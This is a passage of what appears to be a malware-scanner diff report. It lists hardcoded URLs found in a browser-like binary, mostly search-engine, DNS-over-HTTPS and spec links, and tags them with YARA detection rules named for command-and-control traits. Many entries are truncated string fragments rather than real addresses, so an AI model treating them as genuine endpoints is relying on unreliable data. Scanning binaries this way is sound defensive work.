[http://searchfunmoods.com/favicon.ico](http://searchfunmoods.com/favicon.ico)
[http://searchfunmoods.com/results.php](http://searchfunmoods.com/results.php)
[http://www.w3.org/TR/html4/strict.dtd](http://www.w3.org/TR/html4/strict.dtd)
[http://www.webrtc.org/experiments/rtp](http://www.webrtc.org/experiments/rtp)
[https://c.android.clients.google.com/](https://c.android.clients.google.com/)
[https://clients3.google.com/ct_upload](https://clients3.google.com/ct_upload)
[https://developer.chrome.com/blog/mv2](https://developer.chrome.com/blog/mv2)
[https://discord.com/invite/APGC3k5yaH](https://discord.com/invite/APGC3k5yaH)
[https://github.com/WebBluetoothCG/web](https://github.com/WebBluetoothCG/web)
[https://gpuweb.github.io/gpuweb/wgsl/](https://gpuweb.github.io/gpuweb/wgsl/)
[https://linux.die.net/man/1/dircolors](https://linux.die.net/man/1/dircolors)
[https://search.naver.com/search.naver](https://search.naver.com/search.naver)
[https://suggest.seznam.cz/fulltext_ff](https://suggest.seznam.cz/fulltext_ff)
[https://suggest.seznam.sk/fulltext_ff](https://suggest.seznam.sk/fulltext_ff)
[https://suggest.yandex.com.tr/suggest](https://suggest.yandex.com.tr/suggest)
[https://www.chromium.org/blink/origin](https://www.chromium.org/blink/origin)
[https://www.googleapis.com/spelling/v](https://www.googleapis.com/spelling/v)
[https://www.verisign.com/cps04000000Z](https://www.verisign.com/cps04000000Z)
[http://buscador.terra.es/favicon.ico](http://buscador.terra.es/favicon.ico)
[http://search.sweetim.com/search.asp](http://search.sweetim.com/search.asp)
[http://www.brynosaurus.com/cachedir/](http://www.brynosaurus.com/cachedir/)
[http://www.w3.org/1999/XSL/Transform](http://www.w3.org/1999/XSL/Transform)
[http://www.w3.org/TR/html4/loose.dtd](http://www.w3.org/TR/html4/loose.dtd)
[http://www.w3.org/XML/1998/namespace](http://www.w3.org/XML/1998/namespace)
[https://blog.chromium.org/2019/10/no](https://blog.chromium.org/2019/10/no)
[https://duckduckgo.com/chrome_newtab](https://duckduckgo.com/chrome_newtab)
[https://github.com/antirez/linenoise](https://github.com/antirez/linenoise)
[https://nodejs.org/en/docs/inspector](https://nodejs.org/en/docs/inspector)
[https://search.seznam.cz/favicon.ico](https://search.seznam.cz/favicon.ico)
[https://search.seznam.sk/favicon.ico](https://search.seznam.sk/favicon.ico)
[https://search.yahoo.com/favicon.ico](https://search.yahoo.com/favicon.ico)
[https://search.yahoo.com/sugg/chrome](https://search.yahoo.com/sugg/chrome)
[https://www.iana.org/assignments/tls](https://www.iana.org/assignments/tls)
[http://imgs.sapo.pt/images/sapo.ico](http://imgs.sapo.pt/images/sapo.ico)
[http://search.imesh.net/favicon.ico](http://search.imesh.net/favicon.ico)
[http://www.searchnu.com/favicon.ico](http://www.searchnu.com/favicon.ico)
[https://dawn.googlesource.com/dawn/](https://dawn.googlesource.com/dawn/)
[https://dev.chromium.org/throttling](https://dev.chromium.org/throttling)
[https://dl.gmx.com/apps/favicon.ico](https://dl.gmx.com/apps/favicon.ico)
[https://en.wikipedia.org/wiki/SPKAC](https://en.wikipedia.org/wiki/SPKAC)
[https://github.com/mysticatea/abort](https://github.com/mysticatea/abort)
[https://oceanhero.today/favicon.ico](https://oceanhero.today/favicon.ico)
[https://search.daum.net/favicon.ico](https://search.daum.net/favicon.ico)
[https://search.gmx.co.uk/web/result](https://search.gmx.co.uk/web/result)
[https://tools.ietf.org/html/rfc2397](https://tools.ietf.org/html/rfc2397)
[https://tools.ietf.org/html/rfc3492](https://tools.ietf.org/html/rfc3492)
[https://tools.ietf.org/html/rfc3986](https://tools.ietf.org/html/rfc3986)
[https://tools.ietf.org/html/rfc5280](https://tools.ietf.org/html/rfc5280)
[https://tools.ietf.org/html/rfc6455](https://tools.ietf.org/html/rfc6455)
[https://tools.ietf.org/html/rfc6960](https://tools.ietf.org/html/rfc6960)
[https://tools.ietf.org/html/rfc7230](https://tools.ietf.org/html/rfc7230)
[https://tools.ietf.org/html/rfc7540](https://tools.ietf.org/html/rfc7540)
[https://www.quad9.net/home/privacy/](https://www.quad9.net/home/privacy/)
[https://www.w3.org/TR/WebCryptoAPI/](https://www.w3.org/TR/WebCryptoAPI/)
[https://www.yandex.by/chrome/newtab](https://www.yandex.by/chrome/newtab)
[https://www.yandex.kz/chrome/newtab](https://www.yandex.kz/chrome/newtab)
[https://www.yandex.ru/chrome/newtab](https://www.yandex.ru/chrome/newtab)
[https://www.yandex.ua/chrome/newtab](https://www.yandex.ua/chrome/newtab)
[https://yandex.com.tr/gorsel/search](https://yandex.com.tr/gorsel/search)
[http://addEventListenerresponsible](http://addEventListenerresponsible)
[http://tools.ietf.org/html/rfc3986](http://tools.ietf.org/html/rfc3986)
[http://www.conduit.com/favicon.ico](http://www.conduit.com/favicon.ico)
[http://www.w3.org/1998/Math/MathML](http://www.w3.org/1998/Math/MathML)
[http://www.walla.co.il/favicon.ico](http://www.walla.co.il/favicon.ico)
[https://ac.ecosia.org/autocomplete](https://ac.ecosia.org/autocomplete)
[https://aomediacodec.github.io/av1](https://aomediacodec.github.io/av1)
[https://api.qwant.com/api/suggest/](https://api.qwant.com/api/suggest/)
[https://ar.search.yahoo.com/search](https://ar.search.yahoo.com/search)
[https://at.search.yahoo.com/search](https://at.search.yahoo.com/search)
[https://au.search.yahoo.com/search](https://au.search.yahoo.com/search)
[https://br.search.yahoo.com/search](https://br.search.yahoo.com/search)
[https://c.bigcache.googleapis.com/](https://c.bigcache.googleapis.com/)
[https://ca.search.yahoo.com/search](https://ca.search.yahoo.com/search)
[https://ch.search.yahoo.com/search](https://ch.search.yahoo.com/search)
[https://chrome.google.com/webstore](https://chrome.google.com/webstore)
[https://cl.search.yahoo.com/search](https://cl.search.yahoo.com/search)
[https://co.search.yahoo.com/search](https://co.search.yahoo.com/search)
[https://de.search.yahoo.com/search](https://de.search.yahoo.com/search)
[https://dk.search.yahoo.com/search](https://dk.search.yahoo.com/search)
[https://duckduckgo.com/favicon.ico](https://duckduckgo.com/favicon.ico)
[https://es.search.yahoo.com/search](https://es.search.yahoo.com/search)
[https://fi.search.yahoo.com/search](https://fi.search.yahoo.com/search)
[https://fr.search.yahoo.com/search](https://fr.search.yahoo.com/search)
[https://github.com/WICG/conversion](https://github.com/WICG/conversion)
[https://github.com/WICG/scheduling](https://github.com/WICG/scheduling)
[https://github.com/WebAssembly/esm](https://github.com/WebAssembly/esm)
[https://go.imgsmail.ru/favicon.ico](https://go.imgsmail.ru/favicon.ico)
[https://hk.search.yahoo.com/search](https://hk.search.yahoo.com/search)
[https://id.search.yahoo.com/search](https://id.search.yahoo.com/search)
[https://in.search.yahoo.com/search](https://in.search.yahoo.com/search)
[https://metager.org/meta/meta.ger3](https://metager.org/meta/meta.ger3)
[https://mx.search.yahoo.com/search](https://mx.search.yahoo.com/search)
[https://nl.search.yahoo.com/search](https://nl.search.yahoo.com/search)
[https://nz.search.yahoo.com/search](https://nz.search.yahoo.com/search)
[https://pe.search.yahoo.com/search](https://pe.search.yahoo.com/search)
[https://ph.search.yahoo.com/search](https://ph.search.yahoo.com/search)
[https://qc.search.yahoo.com/search](https://qc.search.yahoo.com/search)
[https://se.search.yahoo.com/search](https://se.search.yahoo.com/search)
[https://sg.search.yahoo.com/search](https://sg.search.yahoo.com/search)
[https://suggest.yandex.com/suggest](https://suggest.yandex.com/suggest)
[https://suggests.go.mail.ru/chrome](https://suggests.go.mail.ru/chrome)
[https://th.search.yahoo.com/search](https://th.search.yahoo.com/search)
[https://tr.search.yahoo.com/search](https://tr.search.yahoo.com/search)
[https://tw.search.yahoo.com/search](https://tw.search.yahoo.com/search)
[https://uk.search.yahoo.com/search](https://uk.search.yahoo.com/search)
[https://ve.search.yahoo.com/search](https://ve.search.yahoo.com/search)
[https://vn.search.yahoo.com/search](https://vn.search.yahoo.com/search)
[https://www.bing.com/chrome/newtab](https://www.bing.com/chrome/newtab)
[https://www.givero.com/favicon.ico](https://www.givero.com/favicon.ico)
[http://search.avg.com/favicon.ico](http://search.avg.com/favicon.ico)
[http://www.w3.org/2000/09/xmldsig](http://www.w3.org/2000/09/xmldsig)
[http://xmlsoft.org/XSLT/namespace](http://xmlsoft.org/XSLT/namespace)
[https://ac.search.naver.com/nx/ac](https://ac.search.naver.com/nx/ac)
[https://cleanbrowsing.org/privacy](https://cleanbrowsing.org/privacy)
[https://encoding.spec.whatwg.org/](https://encoding.spec.whatwg.org/)
[https://github.com/WICG/construct](https://github.com/WICG/construct)
[https://github.com/chalk/supports](https://github.com/chalk/supports)
[https://github.com/google/closure](https://github.com/google/closure)
[https://github.com/mafintosh/pump](https://github.com/mafintosh/pump)
[https://go.mail.ru/chrome/newtab/](https://go.mail.ru/chrome/newtab/)
[https://hladaj.atlas.sk/fulltext/](https://hladaj.atlas.sk/fulltext/)
[https://metager.de/meta/meta.ger3](https://metager.de/meta/meta.ger3)
[https://search.gmx.com/web/result](https://search.gmx.com/web/result)
[https://search.yahoo.co.jp/search](https://search.yahoo.co.jp/search)
[https://sourcemaps.info/spec.html](https://sourcemaps.info/spec.html)
[https://suggest.yandex.by/suggest](https://suggest.yandex.by/suggest)
[https://suggest.yandex.kz/suggest](https://suggest.yandex.kz/suggest)
[https://suggest.yandex.ru/suggest](https://suggest.yandex.ru/suggest)
[https://suggest.yandex.ua/suggest](https://suggest.yandex.ua/suggest)
[https://suggestplugin.gmx.co.uk/s](https://suggestplugin.gmx.co.uk/s)
[https://www.baidu.com/favicon.ico](https://www.baidu.com/favicon.ico)
[https://www.neti.ee/api/suggestOS](https://www.neti.ee/api/suggestOS)
[https://www.qwant.com/favicon.ico](https://www.qwant.com/favicon.ico)
[https://www.zoznam.sk/favicon.ico](https://www.zoznam.sk/favicon.ico)
[https://www.zoznam.sk/hladaj.fcgi](https://www.zoznam.sk/hladaj.fcgi)
[http://code.google.com/p/closure](http://code.google.com/p/closure)
[http://hladaj.atlas.sk/fulltext/](http://hladaj.atlas.sk/fulltext/)
[http://l.twimg.com/i/hpkp_report](http://l.twimg.com/i/hpkp_report)
[http://pesquisa.sapo.pt/livesapo](http://pesquisa.sapo.pt/livesapo)
[http://purl.org/dc/elements/1.1/](http://purl.org/dc/elements/1.1/)
[http://search.tut.by/favicon.ico](http://search.tut.by/favicon.ico)
[http://suggest.yandex.ru/suggest](http://suggest.yandex.ru/suggest)
[http://www.neti.ee/api/suggestOS](http://www.neti.ee/api/suggestOS)
[http://www.w3.org/2001/XMLSchema](http://www.w3.org/2001/XMLSchema)
[http://www.w3.org/2002/08/xquery](http://www.w3.org/2002/08/xquery)
[http://www.zoznam.sk/hladaj.fcgi](http://www.zoznam.sk/hladaj.fcgi)
[https://c.googlesyndication.com/](https://c.googlesyndication.com/)
[https://console.spec.whatwg.org/](https://console.spec.whatwg.org/)
[https://developer.mozilla.org/en](https://developer.mozilla.org/en)
[https://github.com/mafintosh/end](https://github.com/mafintosh/end)
[https://github.com/tc39/proposal](https://github.com/tc39/proposal)
[https://github.com/w3c/webappsec](https://github.com/w3c/webappsec)
[https://heycam.github.io/webidl/](https://heycam.github.io/webidl/)
[https://search.gmx.es/web/result](https://search.gmx.es/web/result)
[https://search.gmx.fr/web/result](https://search.gmx.fr/web/result)
[https://search.goo.ne.jp/sgt.jsp](https://search.goo.ne.jp/sgt.jsp)
[https://search.goo.ne.jp/web.jsp](https://search.goo.ne.jp/web.jsp)
[https://suche.gmx.net/web/result](https://suche.gmx.net/web/result)
[https://www.bing.com/osjson.aspx](https://www.bing.com/osjson.aspx)
[https://www.delfi.lt/favicon.ico](https://www.delfi.lt/favicon.ico)
[https://yandex.by/images/search/](https://yandex.by/images/search/)
[https://yandex.com/images/search](https://yandex.com/images/search)
[https://yandex.kz/images/search/](https://yandex.kz/images/search/)
[https://yandex.ru/images/search/](https://yandex.ru/images/search/)
[https://yandex.ua/images/search/](https://yandex.ua/images/search/)
[http://csp.yahoo.com/beacon/csp](http://csp.yahoo.com/beacon/csp)
[http://g1.delphi.lv/favicon.ico](http://g1.delphi.lv/favicon.ico)
[http://mysearch.sweetpacks.com/](http://mysearch.sweetpacks.com/)
[http://ns.adobe.com/xap/1.0/mm/](http://ns.adobe.com/xap/1.0/mm/)
[http://search.goo.ne.jp/sgt.jsp](http://search.goo.ne.jp/sgt.jsp)
[http://search.goo.ne.jp/web.jsp](http://search.goo.ne.jp/web.jsp)
[http://szukaj.wp.pl/szukaj.html](http://szukaj.wp.pl/szukaj.html)
[http://www.aiim.org/pdfa/ns/id/](http://www.aiim.org/pdfa/ns/id/)
[http://www.delfi.lv/search_all/](http://www.delfi.lv/search_all/)
[https://chromium.dns.nextdns.io](https://chromium.dns.nextdns.io)
[https://github.com/isaacs/color](https://github.com/isaacs/color)
[https://log.getdropbox.com/hpkp](https://log.getdropbox.com/hpkp)
[https://matteomarescotti.report](https://matteomarescotti.report)
[https://nodejs.org/api/cli.html](https://nodejs.org/api/cli.html)
[https://nova.rambler.ru/suggest](https://nova.rambler.ru/suggest)
[https://play.google.com/billing](https://play.google.com/billing)
[https://search.yahoo.com/search](https://search.yahoo.com/search)
[https://suche.gmx.at/web/result](https://suche.gmx.at/web/result)
[https://suggestion.baidu.com/su](https://suggestion.baidu.com/su)
[https://suggestplugin.gmx.com/s](https://suggestplugin.gmx.com/s)
[https://suggestplugin.gmx.net/s](https://suggestplugin.gmx.net/s)
[https://tc39.github.io/ecma262/](https://tc39.github.io/ecma262/)
[https://w3c.github.io/encrypted](https://w3c.github.io/encrypted)
[https://w3c.github.io/manifest/](https://w3c.github.io/manifest/)
[https://w3c.github.io/webappsec](https://w3c.github.io/webappsec)
[http://crl.globalsign.net/root](http://crl.globalsign.net/root)
[http://mystart.incredibar.com/](http://mystart.incredibar.com/)
[http://nova.rambler.ru/suggest](http://nova.rambler.ru/suggest)
[http://search.babylon.com/home](http://search.babylon.com/home)
[http://searchatlas.centrum.cz/](http://searchatlas.centrum.cz/)
[http://www.neti.ee/favicon.ico](http://www.neti.ee/favicon.ico)
[http://www.w3.org/Graphics/SVG](http://www.w3.org/Graphics/SVG)
[http://www.wencodeURIComponent](http://www.wencodeURIComponent)
[http://www.xfa.org/schema/xci/](http://www.xfa.org/schema/xci/)
[http://www.xfa.org/schema/xdc/](http://www.xfa.org/schema/xdc/)
[https://buscador.softonic.com/](https://buscador.softonic.com/)
[https://coccoc.com/favicon.ico](https://coccoc.com/favicon.ico)
[https://dnsnl.alekberg.net/dns](https://dnsnl.alekberg.net/dns)
[https://infra.spec.whatwg.org/](https://infra.spec.whatwg.org/)
[https://isearch.avg.com/search](https://isearch.avg.com/search)
[https://metager.de/favicon.ico](https://metager.de/favicon.ico)
[https://nodejs.org/api/fs.html](https://nodejs.org/api/fs.html)
[https://nova.rambler.ru/search](https://nova.rambler.ru/search)
[https://petalsearch.com/search](https://petalsearch.com/search)
[https://search.daum.net/search](https://search.daum.net/search)
[https://suggestplugin.gmx.at/s](https://suggestplugin.gmx.at/s)
[https://suggestplugin.gmx.es/s](https://suggestplugin.gmx.es/s)
[https://suggestplugin.gmx.fr/s](https://suggestplugin.gmx.fr/s)
[https://www.givero.com/suggest](https://www.givero.com/suggest)
[https://www.so.com/favicon.ico](https://www.so.com/favicon.ico)
[https://www.softonic.com.br/s/](https://www.softonic.com.br/s/)
[https://www.w3.org/TR/powerful](https://www.w3.org/TR/powerful)
[https://www.w3.org/TR/webauthn](https://www.w3.org/TR/webauthn)
[http://buscador.softonic.com/](http://buscador.softonic.com/)
[http://isearch.avg.com/search](http://isearch.avg.com/search)
[http://nova.rambler.ru/search](http://nova.rambler.ru/search)
[http://search.imesh.net/music](http://search.imesh.net/music)
[http://www.conduit.com/search](http://www.conduit.com/search)
[http://www.softonic.com.br/s/](http://www.softonic.com.br/s/)
[http://www.w3.org/2000/xmlns/](http://www.w3.org/2000/xmlns/)
[http://www.w3.org/TR/1999/REC](http://www.w3.org/TR/1999/REC)
[http://www.xfa.com/schema/xfa](http://www.xfa.com/schema/xfa)
[http://www.xfa.org/schema/xfa](http://www.xfa.org/schema/xfa)
[https://github.com/chalk/ansi](https://github.com/chalk/ansi)
[https://public.dns.iij.jp/dns](https://public.dns.iij.jp/dns)
[https://search.avg.com/route/](https://search.avg.com/route/)
[https://sug.so.360.cn/suggest](https://sug.so.360.cn/suggest)
[https://www.delfi.lt/paieska/](https://www.delfi.lt/paieska/)
[https://www.ecosia.org/search](https://www.ecosia.org/search)
[https://www.givero.com/search](https://www.givero.com/search)
[https://www.google.com/speech](https://www.google.com/speech)
[https://xhr.spec.whatwg.org/.](https://xhr.spec.whatwg.org/.)
[http://Descriptionrelatively](http://Descriptionrelatively)
[http://ns.adobe.com/pdf/1.3/](http://ns.adobe.com/pdf/1.3/)
[http://ns.adobe.com/xdp/pdf/](http://ns.adobe.com/xdp/pdf/)
[http://ns.adobe.com/xmpmeta/](http://ns.adobe.com/xmpmeta/)
[http://ok.hu/gfx/favicon.ico](http://ok.hu/gfx/favicon.ico)
[http://search.avg.com/route/](http://search.avg.com/route/)
[http://search.avg.com/search](http://search.avg.com/search)
[http://www.delfi.lt/paieska/](http://www.delfi.lt/paieska/)
[http://www.ietf.org/id/draft](http://www.ietf.org/id/draft)
[http://www.w3.org/1999/02/22](http://www.w3.org/1999/02/22)
[http://www.w3.org/1999/xhtml](http://www.w3.org/1999/xhtml)
[http://www.w3.org/1999/xlink](http://www.w3.org/1999/xlink)
[https://alekberg.net/privacy](https://alekberg.net/privacy)
[https://dns64.dns.google/dns](https://dns64.dns.google/dns)
[https://doh.quickline.ch/dns](https://doh.quickline.ch/dns)
[https://search.softonic.com/](https://search.softonic.com/)
[https://url.spec.whatwg.org/](https://url.spec.whatwg.org/)
[https://www.microsoft.com/en](https://www.microsoft.com/en)
[https://www.verisign.com/rpa](https://www.verisign.com/rpa)
[http://crl.godaddy.com/gds1](http://crl.godaddy.com/gds1)
[http://www.searchnu.com/web](http://www.searchnu.com/web)
[https://c.drive.google.com/](https://c.drive.google.com/)
[https://crbug.com/dawn/1016](https://crbug.com/dawn/1016)
[https://crbug.com/dawn/1071](https://crbug.com/dawn/1071)
[https://crbug.com/dawn/1203](https://crbug.com/dawn/1203)
[https://crbug.com/dawn/1264](https://crbug.com/dawn/1264)
[https://crbug.com/dawn/1302](https://crbug.com/dawn/1302)
[https://crbug.com/dawn/1305](https://crbug.com/dawn/1305)
[https://crbug.com/tint/1003](https://crbug.com/tint/1003)
[https://dns10.quad9.net/dns](https://dns10.quad9.net/dns)
[https://dns11.quad9.net/dns](https://dns11.quad9.net/dns)
[https://doh.opendns.com/dns](https://doh.opendns.com/dns)
[https://doh.xfinity.com/dns](https://doh.xfinity.com/dns)
[https://github.com/standard](https://github.com/standard)
[https://oceanhero.today/web](https://oceanhero.today/web)
[https://search.walla.co.il/](https://search.walla.co.il/)
[https://www.bing.com/search](https://www.bing.com/search)
[https://www.softonic.com/s/](https://www.softonic.com/s/)
[http://ocsp.godaddy.com/0J](http://ocsp.godaddy.com/0J)
[http://search.walla.co.il/](http://search.walla.co.il/)
[http://www.softonic.com/s/](http://www.softonic.com/s/)
[http://www.w3.org/2000/svg](http://www.w3.org/2000/svg)
[http://www.w3.org/shortcut](http://www.w3.org/shortcut)
[https://c.docs.google.com/](https://c.docs.google.com/)
[https://c.pack.google.com/](https://c.pack.google.com/)
[https://c.play.google.com/](https://c.play.google.com/)
[https://crbug.com/1038223.](https://crbug.com/1038223.)
[https://crbug.com/1144908.](https://crbug.com/1144908.)
[https://crbug.com/dawn/136](https://crbug.com/dawn/136)
[https://crbug.com/dawn/145](https://crbug.com/dawn/145)
[https://crbug.com/dawn/155](https://crbug.com/dawn/155)
[https://crbug.com/dawn/193](https://crbug.com/dawn/193)
[https://crbug.com/dawn/237](https://crbug.com/dawn/237)
[https://crbug.com/dawn/271](https://crbug.com/dawn/271)
[https://crbug.com/dawn/286](https://crbug.com/dawn/286)
[https://crbug.com/dawn/342](https://crbug.com/dawn/342)
[https://crbug.com/dawn/343](https://crbug.com/dawn/343)
[https://crbug.com/dawn/402](https://crbug.com/dawn/402)
[https://crbug.com/dawn/434](https://crbug.com/dawn/434)
[https://crbug.com/dawn/480](https://crbug.com/dawn/480)
[https://crbug.com/dawn/582](https://crbug.com/dawn/582)
[https://crbug.com/dawn/633](https://crbug.com/dawn/633)
[https://crbug.com/dawn/666](https://crbug.com/dawn/666)
[https://crbug.com/dawn/667](https://crbug.com/dawn/667)
[https://crbug.com/dawn/673](https://crbug.com/dawn/673)
[https://crbug.com/dawn/776](https://crbug.com/dawn/776)
[https://crbug.com/dawn/792](https://crbug.com/dawn/792)
[https://crbug.com/dawn/838](https://crbug.com/dawn/838)
[https://crbug.com/dawn/840](https://crbug.com/dawn/840)
[https://crbug.com/dawn/960](https://crbug.com/dawn/960)
[https://duckduckgo.com/ac/](https://duckduckgo.com/ac/)
[https://en.softonic.com/s/](https://en.softonic.com/s/)
[https://go.mail.ru/msearch](https://go.mail.ru/msearch)
[https://m.so.com/index.php](https://m.so.com/index.php)
[https://nextdns.io/privacy](https://nextdns.io/privacy)
[https://nl.softonic.com/s/](https://nl.softonic.com/s/)
[https://tobiassachs.report](https://tobiassachs.report)
[https://yandex.com/search/](https://yandex.com/search/)
[http://en.softonic.com/s/](http://en.softonic.com/s/)
[http://nl.softonic.com/s/](http://nl.softonic.com/s/)
[http://ns.adobe.com/xfdf/](http://ns.adobe.com/xfdf/)
[http://search.snapdo.com/](http://search.snapdo.com/)
[http://unisolated.invalid](http://unisolated.invalid)
[http://www.interpretation](http://www.interpretation)
[https://chrome.cloudflare](https://chrome.cloudflare)
[https://coccoc.com/search](https://coccoc.com/search)
[https://crbug.com/1025266](https://crbug.com/1025266)
[https://crbug.com/1053756](https://crbug.com/1053756)
[https://crbug.com/1154140](https://crbug.com/1154140)
[https://crbug.com/1161355](https://crbug.com/1161355)
[https://crbug.com/1214923](https://crbug.com/1214923)
[https://crbug.com/1302249](https://crbug.com/1302249)
[https://crbug.com/1313172](https://crbug.com/1313172)
[https://crbug.com/619103.](https://crbug.com/619103.)
[https://crbug.com/638180.](https://crbug.com/638180.)
[https://crbug.com/dawn/36](https://crbug.com/dawn/36)
[https://crbug.com/dawn/42](https://crbug.com/dawn/42)
[https://crbug.com/dawn/56](https://crbug.com/dawn/56)
[https://crbug.com/v8/7848](https://crbug.com/v8/7848)
[https://crbug.com/v8/8520](https://crbug.com/v8/8520)
[https://dns.quad9.net/dns](https://dns.quad9.net/dns)
[https://dns.switch.ch/dns](https://dns.switch.ch/dns)
[https://go.mail.ru/search](https://go.mail.ru/search)
[https://scotthelme.report](https://scotthelme.report)
[https://www.info.com/serp](https://www.info.com/serp)
[https://www.sogou.com/web](https://www.sogou.com/web)
[https://www.w3.org/TR/mse](https://www.w3.org/TR/mse)
[http://crbug.com/1138528](http://crbug.com/1138528)
[http://crbug.com/660005.](http://crbug.com/660005.)
[http://mathematicsmargin](http://mathematicsmargin)
[http://ns.adobe.com/data](http://ns.adobe.com/data)
[http://radce.centrum.cz/](http://radce.centrum.cz/)
[http://www.jclark.com/xt](http://www.jclark.com/xt)
[http://www.w3.org/TR/REC](http://www.w3.org/TR/REC)
[https://crbug.com/401439](https://crbug.com/401439)
[https://crbug.com/824383](https://crbug.com/824383)
[https://crbug.com/824647](https://crbug.com/824647)
[https://crbug.com/927119](https://crbug.com/927119)
[https://crbug.com/981419](https://crbug.com/981419)
[https://docs.google.com/](https://docs.google.com/)
[https://googlevideo.com/](https://googlevideo.com/)
[https://m.sogou.com/web/](https://m.sogou.com/web/)
[https://mths.be/punycode](https://mths.be/punycode)
[https://ssl.gstatic.com/](https://ssl.gstatic.com/)
[https://tc39.es/ecma262/](https://tc39.es/ecma262/)
[https://www.nic.cz/odvr/](https://www.nic.cz/odvr/)
[https://www.w3.org/TR/hr](https://www.w3.org/TR/hr)
[http://applicationslink](http://applicationslink)
[http://exslt.org/common](http://exslt.org/common)
[http://feed.snapdo.com/](http://feed.snapdo.com/)
[http://www.search.delta](http://www.search.delta)
[https://android.com/pay](https://android.com/pay)
[https://bit.ly/3rpDuEX.](https://bit.ly/3rpDuEX.)
[https://crbug.com/tint.](https://crbug.com/tint.)
[https://dns.sb/privacy/](https://dns.sb/privacy/)
[https://doh.cox.net/dns](https://doh.cox.net/dns)
[https://odvr.nic.cz/doh](https://odvr.nic.cz/doh)
[https://server1.example](https://server1.example)
[https://server2.example](https://server2.example)
[https://www.ask.com/web](https://www.ask.com/web)
[https://www.baidu.com/s](https://www.baidu.com/s)
[https://www.neti.ee/cgi](https://www.neti.ee/cgi)
[http://html4/loose.dtd](http://html4/loose.dtd)
[http://ok.hu/katalogus](http://ok.hu/katalogus)
[http://search.snap.do/](http://search.snap.do/)
[http://staticsuggested](http://staticsuggested)
[http://www.example.com](http://www.example.com)
[http://www.neti.ee/cgi](http://www.neti.ee/cgi)
[https://c.youtube.com/](https://c.youtube.com/)
[https://dns.google/dns](https://dns.google/dns)
[https://doh.dns.sb/dns](https://doh.dns.sb/dns)
[https://google.com/pay](https://google.com/pay)
[https://history.report](https://history.report)
[https://v8.dev/blog/v8](https://v8.dev/blog/v8)
[https://webrtc.org/web](https://webrtc.org/web)
[http://iparticipation](http://iparticipation)
[https://crbug.com/new](https://crbug.com/new)
[https://gcp.gvt2.com/](https://gcp.gvt2.com/)
[https://gcp.gvt6.com/](https://gcp.gvt6.com/)
[https://github.com/da](https://github.com/da)
[https://goo.gl/4NeimX](https://goo.gl/4NeimX)
[https://goo.gl/7K7WLu](https://goo.gl/7K7WLu)
[https://goo.gl/EuHzyv](https://goo.gl/EuHzyv)
[https://goo.gl/HxfxSQ](https://goo.gl/HxfxSQ)
[https://goo.gl/J6ASzs](https://goo.gl/J6ASzs)
[https://goo.gl/LdLk22](https://goo.gl/LdLk22)
[https://goo.gl/Y0ZkNV](https://goo.gl/Y0ZkNV)
[https://goo.gl/rStTGz](https://goo.gl/rStTGz)
[https://goo.gl/t5IS6M](https://goo.gl/t5IS6M)
[https://goo.gl/xX8pDD](https://goo.gl/xX8pDD)
[https://goo.gl/ximf56](https://goo.gl/ximf56)
[https://goo.gl/yabPex](https://goo.gl/yabPex)
[http://feed.snap.do/](http://feed.snap.do/)
[http://icl.com/saxon](http://icl.com/saxon)
[http://narwhaljs.org](http://narwhaljs.org)
[http://userguide.icu](http://userguide.icu)
[http://wpad/wpad.dat](http://wpad/wpad.dat)
[http://www.color.org](http://www.color.org)
[http://www.language=](http://www.language=)
[http://www.yhs.delta](http://www.yhs.delta)
[https://bit.ly/audio](https://bit.ly/audio)
[https://www.so.com/s](https://www.so.com/s)
[http://mixidj.delta](http://mixidj.delta)
[http://www.midnight](http://www.midnight)
[https://example.org](https://example.org)
[http://interpreted](http://interpreted)
[http://www.hortcut](http://www.hortcut)
[http://www2.public](http://www2.public)
[https://m.so.com/s](https://m.so.com/s)
[https://wiki.squid](https://wiki.squid)
[https://www.recent](https://www.recent)
[http://dts.search](http://dts.search)
[http://feross.org](http://feross.org)
[http://interested](http://interested)
[http://navigation](http://navigation)
[http://www.C//DTD](http://www.C//DTD)
[http://www.iec.ch](http://www.iec.ch)
[http://www.style=](http://www.style=)
[http://www1.delta](http://www1.delta)
[http://www2.delta](http://www2.delta)
[https://gvt1.com/](https://gvt1.com/)
[https://gvt2.com/](https://gvt2.com/)
[https://gvt6.com/](https://gvt6.com/)
[https://invisible](https://invisible)
[https://www.World](https://www.World)
[http://127.0.0.1](http://127.0.0.1)
[http://according](http://according)
[http://encoding=](http://encoding=)
[http://imEnglish](http://imEnglish)
[http://localhost](http://localhost)
[http://site_name](http://site_name)
[http://www.delta](http://www.delta)
[http://www.squid](http://www.squid)
[http://www.years](http://www.years)
[https://www.ecma](https://www.ecma)
[http://familiar](http://familiar)
[http://www./div](http://www./div)
[http://www.icon](http://www.icon)
[http://www.text](http://www.text) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86_64](https://github.com/search?q=x86_64&type=code)
[amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorithm_params.h](https%3A%2F%2Fgithub.com%2Fchromium%2Fchromium%2Fblob%2FHEAD%2Fthird_party%2Fblink%2Fpublic%2Fplatform%2Fweb_crypto_algorithm_params.h)
[http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js](http%3A%2F%2Fsrc.chromium.org%2Fviewvc%2Fblink%2Ftrunk%2FSource%2Fdevtools%2Ffront_end%2FSourceMap.js)
[https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6](https%3A%2F%2Fgithub.com%2Fnodejs%2Fnode%2Fcommit%2Fec2822adaad76b126b5cccdeaa1addf2376c9aa6)
[https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4](https%3A%2F%2Fgithub.com%2Fnodejs%2Fnode%2Fcommit%2Ff7620fb96d339f704932f9bb9a0dceb9952df2d4)
[https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js](https%3A%2F%2Fgithub.com%2Fgoogle%2Fcaja%2Fblob%2FHEAD%2Fsrc%2Fcom%2Fgoogle%2Fcaja%2Fses%2FrepairES5.js)
